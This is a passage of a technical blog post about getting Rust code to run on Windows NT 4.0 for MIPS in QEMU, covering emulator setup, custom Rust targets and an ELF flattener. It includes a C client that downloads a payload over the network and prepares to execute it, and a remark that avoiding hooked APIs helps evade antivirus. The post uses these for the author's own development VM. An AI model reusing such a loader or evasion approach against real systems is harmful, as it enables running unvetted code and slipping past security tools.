Jekyll2022-05-18T05:06:57+00:00https://gamozolabs.github.io/feed.xmlGamozo Labs BlogI blog about random things security, everything is broken, nothing scales, shared memory models are flawed.Rust on MIPS64 Windows NT 4.02021-11-16T07:00:00+00:002021-11-16T07:00:00+00:00https://gamozolabs.github.io/fuzzing/2021/11/16/rust_on_nt_mips<h2 id="introduction">Introduction</h2>
<p>Some part of me has always been fascinated with coercing code to run in weird
places. I scratch this itch a lot with my security research projects. These
often lead me to writing shellcode to run in kernels or embedded hardware,
sometimes with the only way being through an existing bug.</p>
<p>For those not familiar, shellcode is honestly hard to describe. I don’t know
if there’s a very formal definition, but I’d describe it as code which can be
run in an environment without any external dependencies. This often means it’s
written directly in assembly, and directly interfaces with the system using
syscalls. Usually the code can be relocated and often is represented as a flat
image rather than a normal executable with multiple sections.</p>
<p>To me, this is extra fun as it’s effectively like operating systems
development. You’re working in an environment where you need to bring most of
what you need along with you. You probably want to minimize the dependencies
you have on the system and libraries to increase compatibility and flexibility
with the environments you run. You might have to bring your own allocator,
make your own syscalls, maybe even make a scheduler if you are really trying
to minimize impact.</p>
<p>Some of these things may seem silly, but when it comes to bypassing
anti-viruses, exploit detection tools, and even mitigations, often the easiest
thing to do is just avoid the common APIs that are hooked and monitored.</p>
<h2 id="streams">Streams</h2>
<p>Before we get into it, it’s important to note that this work has been done over
3 different live streams on my <a href="https://twitch.tv/gamozo">Twitch</a>! You can find these archived
on my <a href="https://www.youtube.com/user/gamozolabs">YouTube</a> channel. Everything covered in this blog can be viewed
as it happened in real time, mistakes, debugging, and all!</p>
<p>The 3 videos in question are:</p>
<p><a href="https://www.youtube.com/watch?v=x0V-CEmXQCQ">Day 1 - Getting Rust running on Windows NT 4.0 MIPS64</a></p>
<p><a href="https://www.youtube.com/watch?v=DtFuuq4iX64">Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS</a></p>
<p><a href="https://www.youtube.com/watch?v=zNAPFaDUM7c">Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying</a></p>
<h2 id="source">Source</h2>
<p>This project has spun off 3 open-source GitHub repos, one for the Rust on NT
MIPS project in general, another for converting ELFs to flat images, and a
final one for parsing <code class="language-plaintext highlighter-rouge">.DBG</code> symbol files for applying symbols to Binary Ninja
or whatever tool you want symbols in! I’ve also documented the commit hashes
for the repos as of this writing if things have changed since you’ve read this!</p>
<p><a href="https://github.com/gamozolabs/rust_mips_nt4">Rust on NT MIPS - 2028568</a></p>
<p><a href="https://github.com/gamozolabs/elfloader">ELF loader - 30c77ca</a></p>
<p><a href="https://github.com/gamozolabs/coff_nm">DBG COFF parser - b7bcdbb</a></p>
<p>Don’t forget to follow me on socials and like and subscribe of course. Maybe
eventually I can do research and education full time!~ Oh, also follow me on
my Twitter <a href="https://twitter.com/gamozolabs">@gamozolabs</a></p>
<h2 id="mips-on-windows-nt">MIPS on Windows NT</h2>
<p>Windows NT actually has a pretty fascinating history of architecture support.
It supported x86 as we know and love, but additionally it supported Alpha,
ARM, and PowerPC. If you include the embedded versions of Windows there’s
support for some even more exotic architectures.</p>
<p>MIPS is one of my favorite architectures as the simplicity makes it really fun
to develop emulators for. As someone who writes a lot of emulators, it’s often
one of my first targets during development, as I know it can be implemented in
less than a day of work. Finding out that MIPS NT can run in QEMU was quite
exciting for me. The first time I played around with this was maybe ~5 years
ago, but recently I thought it’d be a fun project to demonstrate harnessing of
targets for fuzzing. Not only does it have some hard problems in harnessing,
as there are almost no existing tools for working with MIPS NT binaries, but
it also leads us to some fun future projects where custom emulators can come
into the picture!</p>
<p>There’s actually a fantastic series by Raymond Chen which I highly recommend
you check out
<a href="https://devblogs.microsoft.com/oldnewthing/20180402-00/?p=98415">here</a>.</p>
<p>There’s actually a few of these series by Raymond for various architectures on
NT. They definitely don’t pull punches on details, definitely a fantastic read!</p>
<h2 id="running-windows-nt-40-mips-in-qemu">Running Windows NT 4.0 MIPS in QEMU</h2>
<p>Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already
supports the <code class="language-plaintext highlighter-rouge">magnum</code> machine, which runs on a R4000 MIPS processor, the first
64-bit MIPS processor, running an implementation of the MIPS III ISA.
Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader
capable of booting Windows, maybe it’s video BIOS, I don’t know. You can
find this <a href="http://web.archive.org/web/20150809205748/http://hpoussineau.free.fr/qemu/firmware/magnum-4000/setup.zip">here</a>.
Simply extract the file, and rename <code class="language-plaintext highlighter-rouge">NTPROM.RAW</code> to <code class="language-plaintext highlighter-rouge">mipsel_bios.bin</code>.</p>
<p>Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s
a bit of configuration you need to do in the BIOS to get it to detect your CD,
and you need to configure your MAC address otherwise networking in NT doesn’t
seem to work beyond a DHCP lease. Anyways, you can find more details about
getting MIPS NT 4.0 running in QEMU <a href="http://gunkies.org/wiki/Installing_Windows_NT_4.0_on_Qemu%28MIPS%29">here</a>.</p>
<p>I also cover the process I use, and include my <code class="language-plaintext highlighter-rouge">run.sh</code> script <a href="https://github.com/gamozolabs/rust_mips_nt4">here</a>.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>
<span class="nv">ISO</span><span class="o">=</span><span class="s2">"winnt40wks_sp1_en.iso"</span>
<span class="c">#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"</span>
qemu-system-mips64el <span class="se">\</span>
<span class="nt">-M</span> magnum <span class="se">\</span>
<span class="nt">-cpu</span> VR5432 <span class="se">\</span>
<span class="nt">-m</span> 128 <span class="se">\</span>
<span class="nt">-net</span> nic <span class="se">\</span>
<span class="nt">-net</span> user,hostfwd<span class="o">=</span>tcp::5555-:42069 <span class="se">\</span>
<span class="nt">-global</span> ds1225y.filename<span class="o">=</span>nvram <span class="se">\</span>
<span class="nt">-global</span> ds1225y.size<span class="o">=</span>8200 <span class="se">\</span>
<span class="nt">-L</span> <span class="nb">.</span> <span class="se">\</span>
<span class="nt">-hda</span> nt4.qcow2 <span class="se">\</span>
<span class="nt">-cdrom</span> <span class="s2">"</span><span class="nv">$ISO</span><span class="s2">"</span>
</code></pre></div></div>
<p><img src="/assets/qemu_nt_mips.png" alt="Windows NT 4.0 running in QEMU MIPS" /></p>
<h2 id="getting-code-running-on-windows-nt-40">Getting code running on Windows NT 4.0</h2>
<p>Surprisingly, a decent enough environment for development is readily available
for NT 4.0 on MIPS. This includes symbols (included under
<code class="language-plaintext highlighter-rouge">SUPPORT/DEBUG/MIPS/SYMBOLS</code> on the original ISO), as well as debugging tools
such as <code class="language-plaintext highlighter-rouge">ntsd</code>, <code class="language-plaintext highlighter-rouge">cdb</code> and <code class="language-plaintext highlighter-rouge">mipskd</code> (command-line versions of the WinDbg command
interface you may be familiar with), and the cherry on top is a fully working
Visual Studio 4.0 install that will work right inside the MIPS guest!</p>
<p>With Visual Studio 4.0 we can use both the full IDE experience for building
projects, but also the command line <code class="language-plaintext highlighter-rouge">cl.exe</code> compiler and <code class="language-plaintext highlighter-rouge">nmake</code>, my preferred
Windows development experience. I did however use VS4 for the editor as I’m
not using 1996 <code class="language-plaintext highlighter-rouge">notepad.exe</code> for writing code!</p>
<p>Unless you’re doing something really fancy, you’ll be surprised to find much
of the NT APIs just work out of the box on NT4. This includes your standard
way of interacting with sockets, threads, process manipulation, etc. A few
years ago I wrote a snapshotting tool that used all the APIs that I would in
a modern tool to dump virtual memory regions, read them, and read register
contexts. It’s pretty neat!</p>
<p>Nevertheless, if you’re writing C or C++, other than maybe forgetting about
variables having to be declared at the start of a scope, or not using your
bleeding edge Windows 10 APIs, it’s really no different from modern
Windows development. At least… for low level projects.</p>
<h2 id="rust-and-me">Rust and Me</h2>
<p>After about ~10 years of writing <code class="language-plaintext highlighter-rouge">-ansi -pedantic</code> C, where I followed all the
old fashioned rules of declaring variables at the start of scopes, verbose
syntax, etc, I never would have thought I would find myself writing in a
higher-level language. I dabbled in C++ but I really didn’t like the
abstractions and confusion it brought, although that was arguably when I was
a bit less experienced.</p>
<p>Nevertheless, I found myself absolutely falling in love with Rust. This was a
pretty big deal for me as I have very strong requirements about understanding
exactly what sort of assembly is generated from the code I write. I spend a lot
of time optimizing and squeezing every bit of performance out of my code, and
not having this would ruin a language for me. Something about Rust and its
model of abstractions (traits) makes it actually pretty obvious what code will
be generated, even for things like generics.</p>
<p>The first project I did in Rust was porting my hobby OS to it. Definitely a
“thrown into the deep end” style project, but if Rust wasn’t suitable for
operating systems development, it definitely wasn’t going to be a language I
personally would want to invest in. However… it honestly worked great. After
reading the Rust book, I was able to port my OS which consisted of a small
hypervisor, 10gbit networking stack, and some fancy memory management, in less
than a week.</p>
<p>Anyways, rant aside, as a low-level optimization nerd, there was nothing about
Rust, even in 2016, that raised red flags about being able to replace all of
my C in it. Of course, I have many complaints and many things I would change or
want added to Rust, but that’s going to be the case with any language… I’m
picky.</p>
<h2 id="rust-on-mips-nt-40">Rust on MIPS NT 4.0</h2>
<p>Well, I do all of my projects in Rust now. Even little scripts I’d usually
write in Python I often find myself grabbing Rust for. I’m comfortable with
using Rust for pretty much any project at this point, that I decided that for
a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would
want to do this in Rust.</p>
<p>The very first thought that comes to mind is to just build a MIPS executable
from Rust, and just… run it. Well, that would be great, but unfortunately
there were a few hiccups.</p>
<h3 id="rust-on-weird-targets">Rust on weird targets</h3>
<p>Rust actually has pretty good support for weird targets. I mean, I guess we’re
really just relying on, or limited by <em>cough</em>, LLVM. Not only can you simply
pick your target by the <code class="language-plaintext highlighter-rouge">--target</code> triple argument to Rust and Cargo, but also
when you really need control you can define a target specification. This gives
you a large amount of control about the code generated.</p>
<p>For example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json
</code></pre></div></div>
<p>Will give you the JSON spec for my native system, <code class="language-plaintext highlighter-rouge">x86_64-unknown-linux-gnu</code></p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86_64"</span><span class="p">,</span><span class="w">
</span><span class="nl">"cpu"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86-64"</span><span class="p">,</span><span class="w">
</span><span class="nl">"crt-static-respected"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"data-layout"</span><span class="p">:</span><span class="w"> </span><span class="s2">"e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"</span><span class="p">,</span><span class="w">
</span><span class="nl">"dynamic-linking"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"env"</span><span class="p">:</span><span class="w"> </span><span class="s2">"gnu"</span><span class="p">,</span><span class="w">
</span><span class="nl">"executables"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"has-elf-tls"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"has-rpath"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"is-builtin"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"llvm-target"</span><span class="p">:</span><span class="w"> </span><span class="s2">"x86_64-unknown-linux-gnu"</span><span class="p">,</span><span class="w">
</span><span class="nl">"max-atomic-width"</span><span class="p">:</span><span class="w"> </span><span class="mi">64</span><span class="p">,</span><span class="w">
</span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="p">,</span><span class="w">
</span><span class="nl">"position-independent-executables"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
</span><span class="nl">"pre-link-args"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="nl">"gcc"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"-m64"</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">},</span><span class="w">
</span><span class="nl">"relro-level"</span><span class="p">:</span><span class="w"> </span><span class="s2">"full"</span><span class="p">,</span><span class="w">
</span><span class="nl">"stack-probes"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
</span><span class="nl">"kind"</span><span class="p">:</span><span class="w"> </span><span class="s2">"call"</span><span class="w">
</span><span class="p">},</span><span class="w">
</span><span class="nl">"supported-sanitizers"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"address"</span><span class="p">,</span><span class="w">
</span><span class="s2">"cfi"</span><span class="p">,</span><span class="w">
</span><span class="s2">"leak"</span><span class="p">,</span><span class="w">
</span><span class="s2">"memory"</span><span class="p">,</span><span class="w">
</span><span class="s2">"thread"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"target-family"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"unix"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"target-pointer-width"</span><span class="p">:</span><span class="w"> </span><span class="s2">"64"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<p>As you can see, there’s a lot of control you have here. There’s plenty more
options than just in this JSON as well. You can adjust your ABIs, data layout,
calling conventions, output binary types, stack probes, atomic support, and
so many more. This JSON can be modified as you need and you can then pass in
the JSON as <code class="language-plaintext highlighter-rouge">--target <your target json.json></code> to Rust, and it “just works”.</p>
<p>I’ve used this to generate code for targets Rust doesn’t support, like Android
on MIPS (okay there’s maybe a bit of a pattern to my projects here).</p>
<h3 id="back-to-rust-on-mips-nt">Back to Rust on MIPS NT</h3>
<p>Anyways, back to Rust on MIPS NT. Lets just make a custom spec and get LLVM
to generate us a nice portable executable (PE, the <code class="language-plaintext highlighter-rouge">.exe</code> format of Windows)!</p>
<p>Should be easy!</p>
<p>Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran
into an LLVM bug.</p>
<p>It took us some time (well, Twitch chat eventually read the LLVM code instead
of me guessing) to find that the correct target triple if we wanted to get
LLVM to generate a PE for MIPS would be <code class="language-plaintext highlighter-rouge">mips64el-pc-windows-msvccoff</code>. It’s
a weird triple (mainly the <code class="language-plaintext highlighter-rouge">coff</code> suffix), but this is the only path we were
able to find which would cause LLVM to attempt to generate a PE for MIPS. It
definitely seems a bit biased towards making an ELF, but this triple indeed
works…</p>
<p>It works at getting LLVM to try to emit a PE, but unfortunately this feature
is not implemented. Specifically, inside LLVM they will generate the MIPS code,
and then attempt to create the PE by calling <code class="language-plaintext highlighter-rouge">createMCObjectStreamer</code>. This
function doesn’t actually check any of the function pointers before invoking
them, and it turns out that the COFF streamer defaults to <code class="language-plaintext highlighter-rouge">NULL</code>, and for MIPS
it’s not implemented.</p>
<p>Thus… we get a friendly jump to <code class="language-plaintext highlighter-rouge">NULL</code>:</p>
<p><img src="/assets/ripllvm.png" alt="LLVM crash backtrace in GDB" /></p>
<h3 id="can-we-add-support">Can we add support?</h3>
<p>The obvious answer is to quickly take the generic implementation of PE
generation in LLVM and make it work for MIPS and upstream it. Well, after a
deep 30 second analysis of LLVM code, it looks like this would be more work
than I wanted to invest, and after all the issues up to this point my concerns
were that it wouldn’t be the end of the problems.</p>
<h3 id="i-guess-we-have-elfs">I guess we have ELFs</h3>
<p>Well, that leaves us with really one format that LLVM will generate MIPS for
us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I
decided the best way to go would simply be to flatten the ELF into an in-memory
representation and make my own file format that’s easy to write a loader for.</p>
<p>You might think to just use a linker script for this, or to do some magic
<code class="language-plaintext highlighter-rouge">objcopy</code> to rip out code, but unfortunately both of these have limitations.
Linker scripts are fail-open, meaning if you do not specify what happens with
a second, it will just “silently” be added wherever the linker would have put
it by default. There (to my knowledge) is no strict mode, which means if Rust
or LLVM decide to emit some section name you are not expecting, you might end
up with code not being laid out as you expect.</p>
<p><code class="language-plaintext highlighter-rouge">objcopy</code> cannot output zero-initialized BSS sections as they would be
represented in-memory, so once again, this leads to an unexpected section
popping up and breaking the model you expected.</p>
<p>Of course, with enough effort and being picky you can get a linker script to
output whatever format you want, but honestly they kinda just suck to write.</p>
<p>Instead, I decided to just write an ELF flattener. It wouldn’t handle
relocations, imports, exports, permissions or really anything. It wouldn’t even
care about the architecture of the ELF or the payload. Simply, go through each
<code class="language-plaintext highlighter-rouge">LOAD</code> section, place them at their desired address, and pad the space between
them with zeros. This will give a flat in-memory representation of the binary
as it would be loaded without relocations. It doesn’t matter if there’s some
crazy custom assembly or sections defined, the <code class="language-plaintext highlighter-rouge">LOAD</code> sections are all that
matters.</p>
<p>This tool is honestly relatively valuable for other things, as it can also
flatten core dumps into a flat file if you want to inspect a core dump, which
is also an ELF, with your own tooling. I’ve written this ELF loader a handful
of times that I thought it would be worthwhile writing my <em>best</em> version if
this.</p>
<p>The loader simply parses the absolutely required information from the ELF.
This includes checking <code class="language-plaintext highlighter-rouge">\x7FELF</code> magic, reading the endianness (affects the
ELF integer endianness), and the bitness (also affects ELF layout). Any other
information in the header is ignored. Then I parse the program headers, look
for any <code class="language-plaintext highlighter-rouge">LOAD</code> sections (sections indicated by the ELF to be loaded into
memory) and make the flat file.</p>
<p>The ELF format is fairly simple, and the <code class="language-plaintext highlighter-rouge">LOAD</code> sections contain information
about the permissions, virtual address, virtual size (in-memory size), file
offset (location of data to initialize the memory to), and the file size (can
often be less than the memory size, thus any uninitialized bytes are padded
to virtual memory size with zeros).</p>
<p>By concatenating these sections with the correct padding, viola, we have an
in-memory representation of the ELF.</p>
<p>I decided to make a custom FELF (“Falk ELF”) format that indicated where this
blob need to be loaded into memory, and the entry point address that needed
to be jumped into to start execution.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>FELF0001 - Magic header
entry - 64-bit little endian integer of the entry point address
base - 64-bit little endian integer of the base address to load the image
<image> - Rest of the file is the raw image, to be loaded at `base` and jumped
into at `entry`
</code></pre></div></div>
<p>Simple! You can find the source code to this tool at
<a href="https://github.com/gamozolabs/elfloader">My GitHub for elfloader</a>. This
tool also has support for making a raw file, and picking a custom base, not
for relocations, but for padding out the image. For example, if you have the
core dump of a QEMU guest, you can run it through this tool with
<code class="language-plaintext highlighter-rouge">elfloader --binary --base=0 <coredump></code> and it will produce a flat file with
no headers representing all physical memory with MMIO holes and gaps padded
with zero bytes. You can then <code class="language-plaintext highlighter-rouge">mmap()</code> the file and write your own tools to
browse through a guests physical memory (or virtual if you write page table
walking code)! Maybe this is a problem I only find myself running into often,
but within a few days of writing this I’ve even had a coworker use it.</p>
<p>Anyways, enough selling you on this first cool tool we produced. We can turn
an ELF into an in-memory initial representation, woohoo.</p>
<h3 id="felf-loader">FELF loader</h3>
<p>To load a FELF for execution on Windows, we’ll of course need to write a
loader. Of course we could convert the FELF into a PE, but at this point it’s
less effort for us to just use the VC4.0 installation in our guest to write
a very tiny loader. All we have to do is read a file, parse a simple header,
<code class="language-plaintext highlighter-rouge">VirtualAlloc()</code> some RWX memory at the target address, copy the payload to
the memory, and jump to entry!</p>
<p>Unfortunately, this is where it started to start to get dicey. I don’t know if
it’s my window manager, QEMU, or Windows, but very frequently my mouse would
start randomly jumping around in the VM. This meant that I pretty much had
to do all of my development and testing in the VM with only the keyboard. So,
we immediately scrapped the idea of loading a FELF from disk, and went for
network loading.</p>
<h4 id="remote-code-execution">Remote code execution</h4>
<p>As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we
learned the hard way that non-unicast MAC addresses randomly generated by
DuckDuckGo indeed fail in a very hard to debug way), we had access to our host
machine (and the internet) in the guest.</p>
<p>Why load from disk which would require shutting down the VM to mount the disk
and copy the file into, when we could just make this a remote loader. So,
that’s what we did!</p>
<p>We wrote a very simple client that when invoked, would connect to the server,
download a <code class="language-plaintext highlighter-rouge">FELF</code>, load it, and execute it. This was small enough that
developing this inside the VM in VC4.0 was totally fine.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
</span>
<span class="kt">int</span>
<span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SOCKET</span> <span class="n">sock</span><span class="p">;</span>
<span class="n">WSADATA</span> <span class="n">wsaData</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sockaddr</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="c1">// Initialize WSA</span>
<span class="k">if</span><span class="p">(</span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span> <span class="o">&</span><span class="n">wsaData</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"WSAStartup() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create TCP socket</span>
<span class="n">sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="n">IPPROTO_TCP</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">sock</span> <span class="o">==</span> <span class="n">INVALID_SOCKET</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"socket() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="s">"192.168.1.2"</span><span class="p">);</span>
<span class="n">sockaddr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="mi">1234</span><span class="p">);</span>
<span class="c1">// Connect to the socket</span>
<span class="k">if</span><span class="p">(</span><span class="n">connect</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">sockaddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sockaddr</span><span class="p">))</span> <span class="o">==</span> <span class="n">SOCKET_ERROR</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"connect() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Read the payload length</span>
<span class="k">if</span><span class="p">(</span><span class="n">recv</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">len</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">len</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">!=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">len</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"recv() error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Read the payload</span>
<span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="s">"malloc() error "</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">while</span><span class="p">(</span><span class="n">off</span> <span class="o"><</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">bread</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">remain</span> <span class="o">=</span> <span class="n">len</span> <span class="o">-</span> <span class="n">off</span><span class="p">;</span>
<span class="n">bread</span> <span class="o">=</span> <span class="n">recv</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="n">off</span><span class="p">,</span> <span class="n">remain</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="n">bread</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"recv(pl) error : %d"</span><span class="p">,</span> <span class="n">WSAGetLastError</span><span class="p">());</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">off</span> <span class="o">+=</span> <span class="n">bread</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Read everything %u</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
<span class="c1">// FELF0001 + u64 entry + u64 base</span>
<span class="k">if</span><span class="p">(</span><span class="n">len</span> <span class="o"><</span> <span class="mi">3</span> <span class="o">*</span> <span class="mi">8</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Invalid FELF</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="n">buf</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">entry</span><span class="p">,</span> <span class="n">base</span><span class="p">,</span> <span class="n">hi</span><span class="p">,</span> <span class="n">end</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">memcmp</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="s">"FELF0001"</span><span class="p">,</span> <span class="mi">8</span><span class="p">))</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Missing FELF header</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ptr</span> <span class="o">+=</span> <span class="mi">8</span><span class="p">;</span>
<span class="n">entry</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="n">hi</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">hi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Unhandled 64-bit address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">base</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="n">hi</span> <span class="o">=</span> <span class="o">*</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span><span class="p">(</span><span class="n">hi</span><span class="p">)</span> <span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Unhandled 64-bit address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
